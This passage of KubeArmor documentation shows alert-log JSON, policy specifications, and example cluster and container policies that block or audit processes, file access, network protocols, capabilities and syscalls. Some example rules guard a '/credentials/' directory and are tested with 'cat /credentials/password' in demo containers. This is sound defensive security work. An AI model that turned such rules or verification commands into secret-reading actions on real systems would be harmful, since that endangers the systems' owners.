  "ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
  "HostPPID": 2203523,
  "HostPID": 2565259,
  "PPID": 2203523,
  "PID": 3558570,
  "UID": 100,
  "ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/bin/vault",
  "PolicyName": "ksp-vault-network",
  "Severity": "8",
  "Type": "MatchedPolicy",
  "Source": "/bin/vault status -tls-skip-verify",
  "Operation": "Network",
  "Resource": "domain=AF_UNIX type=SOCK_STREAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
  "Data": "syscall=SYS_SOCKET",
  "Enforcer": "eBPF Monitor",
  "Action": "Audit",
  "Result": "Passed"
}
{
  "Timestamp": 1692813948,
  "UpdatedTime": "2023-08-23T18:05:48.301798Z",
  "ClusterName": "default",
  "HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
  "HostPPID": 1979,
  "HostPID": 1787227,
  "PPID": 1979,
  "PID": 1787227,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/bin/sleep",
  "PolicyName": "sleep-deny",
  "Severity": "5",
  "Type": "MatchedHostPolicy",
  "Source": "/bin/bash",
  "Operation": "Process",
  "Resource": "/usr/bin/sleep 10",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Permission denied"
}
{
  "Timestamp": 1692814089,
  "UpdatedTime": "2023-08-23T18:08:09.522743Z",
  "ClusterName": "default",
  "HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
  "HostPPID": 1791315,
  "HostPID": 1791316,
  "PPID": 1791315,
  "PID": 1791316,
  "UID": 204,
  "ParentProcessName": "/usr/sbin/sshd",
  "ProcessName": "/usr/sbin/sshd",
  "PolicyName": "DefaultPosture",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/sbin/sshd",
  "Operation": "Syscall",
  "Data": "syscall=SYS_SETGID userid=0",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Operation not permitted"
}
{
  "Timestamp": 1692814089,
  "UpdatedTime": "2023-08-23T18:08:09.523964Z",
  "ClusterName": "default",
  "HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
  "HostPPID": 1791315,
  "HostPID": 1791316,
  "PPID": 1791315,
  "PID": 1791316,
  "UID": 204,
  "ParentProcessName": "/usr/sbin/sshd",
  "ProcessName": "/usr/sbin/sshd",
  "PolicyName": "DefaultPosture",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/sbin/sshd",
  "Operation": "Syscall",
  "Data": "syscall=SYS_SETUID userid=0",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Operation not permitted"
}
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: [policy name]
  namespace: [namespace name]

spec:
  severity: [1-10]                         # --> optional
  tags: ["tag", ...]                       # --> optional
  message: [message]                       # --> optional

  selector:
    matchLabels:
      [key1]: [value1]
      [keyN]: [valueN]
    matchExpressions:
      - key: [label]
        operator: [In|NotIn]
        values:
          - [labels]

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]              # --> optional

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional

  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:                          # --> optional
      - path: [absolute executable path]

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                          # --> optional
      - path: [absolute executable path]

  syscalls:
    matchSyscalls:
    - syscall:
      - syscallX
      - syscallY
      fromSource:                            # --> optional
      - path: [absolute executable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional
    matchPaths:
    - path: [absolute directory path | absolute executable path]
      recursive: [true|false]                # --> optional
      - syscall:
        - syscallX
        - syscallY
      fromSource:                            # --> optional
      - path: [absolute executable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional

  action: [Allow|Audit|Block] (Block by default)
  apiVersion: security.kubearmor.com/v1
  kind: KubeArmorPolicy
  metadata:
    name: [policy name]
    namespace: [namespace name]
severity: [1-10]
tags: ["tag1", ..., "tagN"]
message: [message]
  selector:
    matchLabels:
      [key1]: [value1]
      [keyN]: [valueN]
  selector:
    matchExpressions:              
      - key: label
        operator: [In|NotIn]
        values:
        - [label]       # string format eg. -> (app=nginx)
  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]            # --> optional
  process:
    matchPaths:
    - path: /bin/sleep
      fromSource:
      - path: /bin/bash
  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
  network:
    matchProtocols:
    - protocol: [protocol]               # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
      fromSource:                        # --> optional
      - path: [absolute file path]
  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                        # --> optional
      - path: [absolute file path]
syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                            # --> optional
    - path: [absolute executable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  matchPaths:
  - path: [absolute directory path | absolute executable path]
    recursive: [true|false]                # --> optional
    - syscall:
      - syscallX
      - syscallY
    fromSource:                            # --> optional
    - path: [absolute executable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  syscalls:
    matchPaths:
    - path: /bin/sleep
      - syscall:
        - unlink
      fromSource:
      - path: /bin/bash
  action: [Allow|Audit|Block]
KubeArmor Open Telemetry format
the KubeArmorPolicy spec diagram
Policy Core Reference
Capability List
Consideration in Policy Action
here
here
here

Cluster Policy Spec for Containers

Cluster Policy Specification

Here is the specification of a Cluster security policy.

apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: [policy name]
  namespace: [namespace name]              # --> optional

spec:
  severity: [1-10]                         # --> optional
  tags: ["tag", ...]                       # --> optional
  message: [message]                       # --> optional

  selector:
    matchExpressions:
      - key: [namespace|label]
        operator: [In|NotIn]
        values:
          - [namespaces|labels]

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]              # --> optional

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional

  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:                          # --> optional
      - path: [absolute executable path]

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                          # --> optional
      - path: [absolute executable path]

  syscalls:
    matchSyscalls:
    - syscall:
      - syscallX
      - syscallY
      fromSource:                            # --> optional
      - path: [absolute executable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional
    matchPaths:
    - path: [absolute directory path | absolute executable path]
      recursive: [true|false]                # --> optional
      - syscall:
        - syscallX
        - syscallY
      fromSource:                            # --> optional
      - path: [absolute executable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional

  action: [Allow|Audit|Block] (Block by default)

Note: For system call monitoring, we only support the Audit action, no matter what the value of action is.

Policy Spec Description

Now, we will briefly explain how to define a cluster security policy.

Common

A cluster security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion would be the same as in any security policy, and kind would be KubeArmorClusterPolicy. In the case of metadata, you need to specify the name of the policy and, optionally, the namespace where you want to apply it.

  apiVersion: security.kubearmor.com/v1
  kind: KubeArmorClusterPolicy
  metadata:
    name: [policy name]
    namespace: [namespace name]

Severity

The severity part is important for triage. You can specify the severity of a given policy from 1 to 10, and this severity will appear in alerts when policy violations happen.

severity: [1-10]

Tags

The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.

tags: ["tag1", ..., "tagN"]

Message

The message part is optional. You can add an alert message, and then the message will be presented in alert logs.

message: [message]

Selector

In the selector section for cluster-based policies, we use matchExpressions to define the namespaces where the policy should be applied and labels to select or deselect workloads in those namespaces. Currently, only namespaces and labels can be matched, so the key should be 'namespace' or 'label'. The operator determines whether the policy applies to the namespaces and workloads specified in the values field or not. The namespace and label matchExpressions are ANDed together.

Operator: In — when the operator is set to In, the policy is applied only to the namespaces listed; if a label matchExpression is also defined, the policy is applied only to the workloads that match the labels in the values field.

Operator: NotIn — when the operator is set to NotIn, the policy is applied to all namespaces except those listed in the values field; if a label matchExpression is also defined, the policy is applied to all workloads except those that match the labels in the values field.

  selector:
    matchExpressions:              
      - key: namespace
        operator: [In|NotIn]
        values:
        - [namespaces]
      - key: label
        operator: [In|NotIn]
        values:
        - [label]       # string format eg. -> (app=nginx)

TIP: If the selector is omitted in the policy, it will be applied across all namespaces.
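For example, a minimal sketch of a cluster policy with no selector (hypothetical name), which would therefore audit apt execution in every namespace:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: csp-audit-apt-all-namespaces    # hypothetical
spec:
  severity: 5
  process:
    matchPaths:
    - path: /usr/bin/apt
  action: Audit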

Process

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]            # --> optional

In each match, there are three options.

  • ownerOnly (static action: allow owner only; otherwise block all)

    If this is enabled, only the owners of the executable(s) defined with matchPaths and matchDirectories will be allowed to execute them.

  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.

  • fromSource

    If a path is specified in fromSource, only the executable at that path will be allowed (or blocked) from executing the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be the only process allowed (or blocked) to execute /bin/sleep; execution of /bin/sleep from any other source will be blocked (or allowed).

      process:
        matchPaths:
        - path: /bin/sleep
          fromSource:
          - path: /bin/bash

File

The file section is quite similar to the process section.

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional

The only difference between 'process' and 'file' is the readOnly option.

  • readOnly (static action: allow to read only; otherwise block all)

    If this is enabled, only the read operation will be allowed, and any other operations (e.g., write) will be blocked.
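As an illustration, a minimal sketch of a read-only file rule in a cluster policy (hypothetical name; the paths and namespace are chosen only for the example):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: csp-readonly-etc-ssl    # hypothetical
spec:
  selector:
    matchExpressions:
      - key: namespace
        operator: In
        values:
          - wordpress-mysql
  file:
    matchDirectories:
    - dir: /etc/ssl/
      readOnly: true
      recursive: true
  action: Block    # writes under /etc/ssl/ are blocked; reads still pass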

Network

In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.

  network:
    matchProtocols:
    - protocol: [protocol]               # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
      fromSource:                        # --> optional
      - path: [absolute file path]

Capabilities

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                        # --> optional
      - path: [absolute file path]

Syscalls

In the case of syscalls, there are two types of matches: matchSyscalls and matchPaths. matchPaths can be used to target system calls aimed at a specific binary path or anything under a specific directory; additionally, you can slice based on the syscalls generated by a binary or by a group of binaries in a directory. You can use matchSyscalls as a more general rule to match syscalls from all sources or from specific binaries.

syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  matchPaths:
  - path: [absolute directory path | absolute exectuable path]
    recursive: [true|false]                # --> optional
    - syscall:
      - syscallX
      - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional

The following options are available in each match.

  • fromSource

    If a path is specified in fromSource, KubeArmor will match only the syscalls generated by the defined source. For better understanding, let's take the example below. Only unlink system calls targeting /bin/sleep and generated by /bin/bash will be matched.

      syscalls:
        matchPaths:
        - path: /bin/sleep
          - syscall:
            - unlink
          fromSource:
          - path: /bin/bash
  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory.

Action

  action: [Allow|Audit|Block]

Cluster Policy Examples for Containers

Here, we demonstrate how to define cluster security policies.

  • Process Execution Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-in-operator-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: In
              values:
                - nginx1
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the containers present in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'In' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-in-operator-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: NotIn
              values:
                - nginx1
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all containers in the cluster except those in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'NotIn' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is not blocked. Now try running the same command in a container inside the 'nginx2' namespace, and it should be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-matchlabels-in-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: In
              values:
                - nginx1
            - key: label
              operator: In
              values:
                - app=nginx
                - app=nginx-dev
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the workloads that match the labels app=nginx OR app=nginx-dev in the namespace nginx1. For this, we define 'nginx1' as the value with operator 'In' for key namespace, AND the values app=nginx and app=nginx-dev with operator 'In' for key label in selector -> matchExpressions, and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked. apt won't be blocked in workloads in namespace nginx1 that don't have the labels app=nginx or app=nginx-dev, nor in any workloads across other namespaces.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-matchlabels-not-in-block-process
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: NotIn
              values:
                - nginx2
            - key: label
              operator: NotIn
              values:
                - app=nginx
        process:
          matchPaths:
            - path: /usr/bin/apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all workloads that do not have the label app=nginx AND are not in the namespace nginx2. For this, we define 'nginx2' as the value with operator 'NotIn' for key namespace, AND app=nginx as the value with operator 'NotIn' for key label in selector -> matchExpressions, and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please exec into any container within the namespace 'nginx2' and run '/usr/bin/apt'; the operation is not blocked there. Then try the same in workloads in other namespaces: if a container doesn't have the label app=nginx, the operation will be blocked; if it does have the label app=nginx, the operation won't be blocked.

  • File Access Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorClusterPolicy
      metadata:
        name: csp-in-operator-block-file-access
      spec:
        severity: 8
        selector:
          matchExpressions:
            - key: namespace
              operator: NotIn
              values:
                - nginx2
        file:
          matchPaths:
            - path: /etc/host.conf
              fromSource:
              - path: /usr/bin/cat
        action:
          Block
      
      • Explanation: The purpose of this policy is to block read access to '/etc/host.conf' (via /usr/bin/cat) in all containers except those in the namespace 'nginx2'.

      • Verification: After applying this policy, please get into a container within the namespace 'nginx2' and run 'cat /etc/host.conf'. You can see that the operation is not blocked and the content of the file is shown. Now try to run 'cat /etc/host.conf' in a container in the 'nginx1' namespace; this operation should be blocked.

Note: Other operations like Network, Capabilities, and Syscalls behave in the same way as in the (namespaced) security policy. The difference only lies in how the cluster policy is matched with namespaces.
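For instance, a hedged sketch of a cluster-wide network rule (hypothetical name) that audits ICMP traffic everywhere except kube-system:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: csp-audit-icmp    # hypothetical
spec:
  severity: 4
  selector:
    matchExpressions:
      - key: namespace
        operator: NotIn
        values:
          - kube-system
  network:
    matchProtocols:
    - protocol: icmp
  action: Audit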

Policy Examples for Containers

Here, we demonstrate how to define security policies using our example microservice (multiubuntu).

  • Process Execution Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-group-1-proc-path-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            group: group-1
        process:
          matchPaths:
          - path: /bin/sleep
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of '/bin/sleep' in the containers with the 'group-1' label. For this, we define the 'group-1' label in selector -> matchLabels and the specific path ('/bin/sleep') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please get into one of the containers with the 'group-1' (using "kubectl -n multiubuntu exec -it ubuntu-X-deployment-... -- bash") and run '/bin/sleep'. You will see that /bin/sleep is blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-match-expression-in-notin-block-process
        namespace: multiubuntu
      spec:
        severity: 5
        message: "block execution of a matching binary name"
        selector:
          matchExpressions:
            - key: label
              operator: In
              values: 
                - container=ubuntu-1
            - key: label
              operator: NotIn
              values: 
                - container=ubuntu-3
        process:
          matchPaths:
          - execname: apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of the 'apt' binary in all workloads in the namespace multiubuntu that carry the label container=ubuntu-1. For this, we define 'container=ubuntu-1' as the value with operator 'In' for key label in selector -> matchExpressions and the specific execname ('apt') in process -> matchPaths. The other expression, container=ubuntu-3 with operator 'NotIn' for key label, is not mandatory, because once something is matched with the 'In' operator, everything else is simply not selected for matching. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please exec into any container who contains label container=ubuntu-1 within the namespace 'multiubuntu' and run 'apt'. You can see the binary is blocked. Then try to do same in other workloads who doesn't contains label container=ubuntu-1, the binary won't be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-match-expression-notin-block-process
        namespace: multiubuntu
      spec:
        severity: 5
        message: "block execution of a matching binary name"
        selector:
          matchExpressions:
            - key: label
              operator: NotIn
              values: 
                - container=ubuntu-1
        process:
          matchPaths:
          - execname: apt
        action:
          Block
      • Explanation: The purpose of this policy is to block the execution of the 'apt' binary in all workloads in the namespace multiubuntu that do not carry the label container=ubuntu-1. For this, we define 'container=ubuntu-1' as the value with operator 'NotIn' for key label in selector -> matchExpressions and the specific execname ('apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please exec into any container who contains label container=ubuntu-1 within the namespace 'multiubuntu' and run 'apt'. You can see the binary is not blocked. Then try to do same in other workloads who doesn't contains label container=ubuntu-1, the binary will be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-1-proc-dir-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            container: ubuntu-1
        process:
          matchDirectories:
          - dir: /sbin/
        action:
          Block
      • Explanation: The purpose of this policy is to block all executables in the '/sbin' directory. Since we want to block all executables rather than a specific executable, we use matchDirectories to specify the executables in the '/sbin' directory at once.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run '/sbin/route' to see if this command is allowed (this command will be blocked).

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-2-proc-dir-recursive-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            container: ubuntu-2
        process:
          matchDirectories:
          - dir: /usr/
            recursive: true
        action:
          Block
      • Explanation: As the extension of the previous policy, we want to block all executables in the '/usr' directory and its subdirectories (e.g., '/usr/bin', '/usr/sbin', and '/usr/local/bin'). Thus, we add 'recursive: true' to extend the scope of the policy.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-2' label and run '/usr/bin/env' or '/usr/bin/whoami'. You will see that those commands are blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-3-file-dir-allow-from-source-path
        namespace: multiubuntu
      spec:
        severity: 10
        message: "a critical directory was accessed"
        tags:
        - WARNING
        selector:
          matchLabels:
            container: ubuntu-3
        file:
          matchDirectories:
          - dir: /credentials/
            fromSource:
            - path: /bin/cat
        action:
          Allow
      • Explanation: Here, we want the container with the 'ubuntu-3' label only to access certain files by specific executables. Otherwise, we want to block any other file accesses. To achieve this goal, we define the scope of this policy using matchDirectories with fromSource and use the 'Allow' action.

      • Verification: In this policy, we allow /bin/cat to access the files in /credentials only. After applying this policy, please get into the container with the 'ubuntu-3' label and run 'cat /credentials/password'. This command will be allowed with no errors. Now, please run 'cat /etc/hostname'. Then, this command will be blocked since /bin/cat is only allowed to access /credentials/*.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-3-proc-path-owner-allow
        namespace: multiubuntu
      spec:
        severity: 7
        selector:
          matchLabels:
            container: ubuntu-3
        process:
          matchPaths:
          - path: /home/user1/hello
            ownerOnly: true
          matchDirectories:
          - dir: /bin/ # required to change root to user1
            recursive: true
          - dir: /usr/bin/ # used in changing accounts
            recursive: true
        file:
          matchPaths:
          - path: /root/.bashrc # used by root
          - path: /root/.bash_history # used by root
          - path: /home/user1/.profile # used by user1
          - path: /home/user1/.bashrc # used by user1
          - path: /run/utmp # required to change root to user1
          - path: /dev/tty
          matchDirectories:
          - dir: /etc/ # required to change root to user1 (coarse-grained way)
            recursive: true
          - dir: /proc/ # required to change root to user1 (coarse-grained way)
            recursive: true
        action:
          Allow
      • Explanation: This policy aims to allow only a specific user (i.e., user1) to launch its own executable (i.e., hello), which means that we do not want even the root user to launch /home/user1/hello. For this, we define a security policy with matchPaths and 'ownerOnly: true'.

      • Verification: For verification, we also allow several directories and files to change users (from 'root' to 'user1') in the policy. After applying this policy, please get into the container with the 'ubuntu-3' label and run '/home/user1/hello' first. This command will be blocked even though you are the 'root' user. Then, please run 'su - user1'. Now, you are the 'user1' user. Please run '/home/user1/hello' again. You will see that it works now.

  • File Access Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-4-file-path-readonly-allow
        namespace: multiubuntu
      spec:
        severity: 10
        message: "a critical file was accessed"
        tags:
        - WARNING
        selector:
          matchLabels:
            container: ubuntu-4
        process:
          matchDirectories:
          - dir: /bin/ # used by root
            recursive: true
          - dir: /usr/bin/ # used by root
            recursive: true
        file:
          matchPaths:
          - path: /credentials/password
            readOnly: true
          - path: /root/.bashrc # used by root
          - path: /root/.bash_history # used by root
          - path: /dev/tty
          matchDirectories:
          - dir: /etc/ # used by root (coarse-grained way)
            recursive: true
          - dir: /proc/ # used by root (coarse-grained way)
            recursive: true
        action:
          Allow
      • Explanation: The purpose of this policy is to allow the container with the 'ubuntu-4' label to read '/credentials/password' only (the write operation is blocked).

      • Verification: After applying this policy, please get into the container with the 'ubuntu-4' label and run 'cat /credentials/password'. You can see the contents in the file. Now, please run 'echo "test" >> /credentials/password'. You will see that the write operation will be blocked.

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-5-file-dir-recursive-block
        namespace: multiubuntu
      spec:
        selector:
          matchLabels:
            container: ubuntu-5
        file:
          matchDirectories:
          - dir: /credentials/
            recursive: true
        action:
          Block
      • Explanation: In this policy, we do not want the container with the 'ubuntu-5' label to access any files in the '/credentials' directory and its subdirectories. Thus, we use 'matchDirectories' and 'recursive: true' to define all files in the '/credentials' directory and its subdirectories.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'cat /secret.txt'. You will see the contents of /secret.txt. Then, please run 'cat /credentials/password'. This command will be blocked due to the security policy.

  • Network Operation Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-5-net-icmp-audit
        namespace: multiubuntu
      spec:
        severity: 8
        selector:
          matchLabels:
            container: ubuntu-5
        network:
          matchProtocols:
          - protocol: icmp
        action:
          Audit
      • Explanation: We want to audit the sending of ICMP packets from the containers with the 'ubuntu-5' label while allowing packets for the other protocols (e.g., TCP and UDP). For this, we use 'matchProtocols' to define the protocol (i.e., ICMP) that we want to audit.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. Since the action is Audit, the ping still succeeds, but KubeArmor generates audit alerts because the 'ping' command internally uses the ICMP protocol.

  • Capabilities Restriction

    • apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: ksp-ubuntu-1-cap-net-raw-block
        namespace: multiubuntu
      spec:
        severity: 1
        selector:
          matchLabels:
            container: ubuntu-1
        capabilities:
          matchCapabilities:
          - capability: net_raw
        action:
          Block
      • Explanation: We want to block any network operations using raw sockets from the containers with the 'ubuntu-1' label, meaning that containers cannot send non-TCP/UDP packets (e.g., ICMP echo request or reply) to other containers. To achieve this, we use matchCapabilities and specify the 'CAP_NET_RAW' capability to block raw socket creation inside the containers. Since TCP and UDP use stream and datagram sockets respectively (not raw sockets), those packets can still be sent to others.

      • Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. You will see 'Operation not permitted' since the 'ping' command internally requires a raw socket to send ICMP packets.

  • System calls alerting

    • Alert for all unlink syscalls

      apiVersion: security.kubearmor.com/v1
      kind: KubeArmorPolicy
      metadata:
        name: audit-all-unlink
        namespace: default
      spec:
        severity: 3
        selector:
          matchLabels:
            container: ubuntu-1
        syscalls:
          matchSyscalls:
          - syscall:
            - unlink
        action:
          Audit
Generated telemetry
{
  "Timestamp": 1661936135,
  "UpdatedTime": "2022-08-31T08:55:35.368285Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "NamespaceName": "default",
  "PodName": "ubuntu-1-6779f689b5-jjcvh",
  "Labels": "container=ubuntu-1",
  "ContainerID": "1f613df8390b9d2e4e89d0323ac0b9a2e7d7ddcc460720e15074f8c497aec0df",
